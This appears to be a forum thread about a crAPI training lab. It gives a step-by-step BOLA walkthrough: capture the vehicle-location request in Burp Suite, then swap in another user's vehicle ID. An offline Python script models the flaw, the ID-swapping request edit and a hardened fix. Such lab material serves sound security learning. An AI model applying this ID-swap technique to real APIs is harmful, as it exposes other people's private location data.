On task 3, I went and reset the lab multiple times (lab restart), and noticed that every so often I log in once with the test user, and if I log out or try to log in with Firefox, for example, I get behaviour similar to yours: unable to log in.
I’ve since reset the lab, and am able to get the vehicle endpoints, but not able to manipulate the vehicle ID on two different endpoints for the target of exploitation (TOE).
If you get to task 3 and can provide pointers, I’m sure they would be greatly appreciated for the learning experience.
Went to the next lab; it wasn’t working right, so I went back to this one. It just hit me: they said “(Notice that it uses a vehicle ID?)”. Once you get your lab back, read through it again and look at what you found previously.
Hmmm… I know that we were looking for the vehicleid/carid, but the problem was that I was able to log in as user@example.com, but when I was probing around, like in the “refresh location”, I don’t know what was causing my repeated HTTP requests to produce 502 errors, and if I tried to refresh the page it would require me to log in again, but I would not be able to, as I would get “Invalid Username or Password”. I wish I had, and should have, taken better notes on the behavior… but once I was able to grab the trophy latitude/longitude, I moved on.
This is what I think I did to get my trophies:
Login with the Test Account:
• Log in to crAPI using the test credentials:
    Email: test@example.com
    Password: Test!123
• Capture the login request and response in BurpSuite. You’ll need the JWT token later for authenticated requests.
Locate Your Own Vehicle’s Coordinates:
• Once logged in, navigate to the Vehicle Details page in the crAPI application (this is usually accessible from the dashboard).
• You’ll find a “Refresh Location” button on the Vehicle Details page. Click this button and capture the request in BurpSuite.
Capture the Vehicle Location API Request:
• In BurpSuite, look for the API request sent when the “Refresh Location” button is clicked.
• Note the vehicle_id used in the request. This ID corresponds to your own vehicle.
Exploit the BOLA Vulnerability:
• To exploit BOLA, replace your vehicle’s ID in the API request with the vehicle_id of another user, such as Adam007. In previous exercises, you captured email addresses from the Community page, which may also include associated vehicle_id fields.
• Modify the request in BurpSuite Repeater or directly through Intercept.
• Replace {adam007_vehicle_id} with the vehicle ID you captured for Adam007 (or another community user).
Send the Modified Request:
• With BurpSuite, send the modified request. Since the server is not properly checking whether you’re authorized to access the vehicle_id of another user, it should return the location coordinates for Adam007’s vehicle.
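The steps above reduce to one test: the same session reads its own vehicle's location, then reads someone else's by changing only the ID in the path. The script below is an added example written for this thread, not code from crAPI or from the lab; it models that check offline. The vehicle IDs, the coordinates and the captured request are constructed sample data, and the `/identity/api/v2/vehicle/{id}/location` path is my assumption of the route behind "Refresh Location", so substitute whatever you actually captured in Burp. It also shows the fix next to the bug, since the point of BOLA is that authentication (the JWT) was checked but ownership of the object was not.

```python
import re

# Constructed sample data (an assumption, not real lab data): vehicle id -> owner and last location.
OWN_VEHICLE_ID = "11111111-1111-4111-8111-111111111111"    # the test user's vehicle
OTHER_VEHICLE_ID = "22222222-2222-4222-8222-222222222222"  # stands in for Adam007's vehicle
VEHICLES = {
    OWN_VEHICLE_ID: {"owner": "test@example.com", "lat": 37.2431, "lon": -115.7930},
    OTHER_VEHICLE_ID: {"owner": "adam007@example.com", "lat": 51.5074, "lon": -0.1278},
}

# Assumed crAPI-style route for "Refresh Location"; substitute the path you captured in Burp.
LOCATION_PATH = re.compile(r"^/identity/api/v2/vehicle/(?P<vid>[0-9a-f-]{36})/location$")


def vulnerable_location(caller, vehicle_id):
    """BOLA: the JWT (reduced here to the caller's email) proves who you are,
    but the handler never checks that the caller owns vehicle_id."""
    vehicle = VEHICLES.get(vehicle_id)
    if vehicle is None:
        return 404, None
    return 200, {"latitude": vehicle["lat"], "longitude": vehicle["lon"]}


def hardened_location(caller, vehicle_id):
    """Fix: look the object up scoped to the authenticated user. A non-owner
    gets 404 rather than 403 so that valid IDs are not confirmed to other users."""
    vehicle = VEHICLES.get(vehicle_id)
    if vehicle is None or vehicle["owner"] != caller:
        return 404, None
    return 200, {"latitude": vehicle["lat"], "longitude": vehicle["lon"]}


def swap_vehicle_id(raw_request, own_id, target_id):
    """The Repeater edit: rewrite the request line so the path names another
    user's vehicle while every other byte (including Authorization) is kept."""
    request_line, sep, rest = raw_request.partition("\r\n")
    method, path, version = request_line.split(" ")
    match = LOCATION_PATH.match(path)
    if match is None or match.group("vid") != own_id:
        raise ValueError("captured request does not fetch your own vehicle's location")
    new_path = path[: match.start("vid")] + target_id + path[match.end("vid"):]
    return f"{method} {new_path} {version}{sep}{rest}"


def probe_bola(handler, caller, own_id, target_id):
    """True when one session can read both its own and another user's vehicle location."""
    own_status, own_body = handler(caller, own_id)
    other_status, other_body = handler(caller, target_id)
    return own_status == 200 and other_status == 200 and other_body != own_body


# Constructed capture of the "Refresh Location" request, in the shape Burp shows it.
CAPTURED_REQUEST = (
    f"GET /identity/api/v2/vehicle/{OWN_VEHICLE_ID}/location HTTP/1.1\r\n"
    "Host: crapi.example\r\n"
    "Authorization: Bearer <jwt-from-the-login-response>\r\n"
    "\r\n"
)

if __name__ == "__main__":
    print(swap_vehicle_id(CAPTURED_REQUEST, OWN_VEHICLE_ID, OTHER_VEHICLE_ID))
    for name, handler in (("vulnerable", vulnerable_location), ("hardened", hardened_location)):
        leaks = probe_bola(handler, "test@example.com", OWN_VEHICLE_ID, OTHER_VEHICLE_ID)
        print(f"{name}: BOLA {'confirmed' if leaks else 'not present'}")
```

Against the real lab, `swap_vehicle_id` is the only step you do by hand: paste the captured request into Repeater, change the ID, keep your own Bearer token, and send. A 200 whose coordinates differ from your own vehicle's is the BOLA; a 404 (or 403) for the other ID while your own still returns 200 is what the hardened handler above produces.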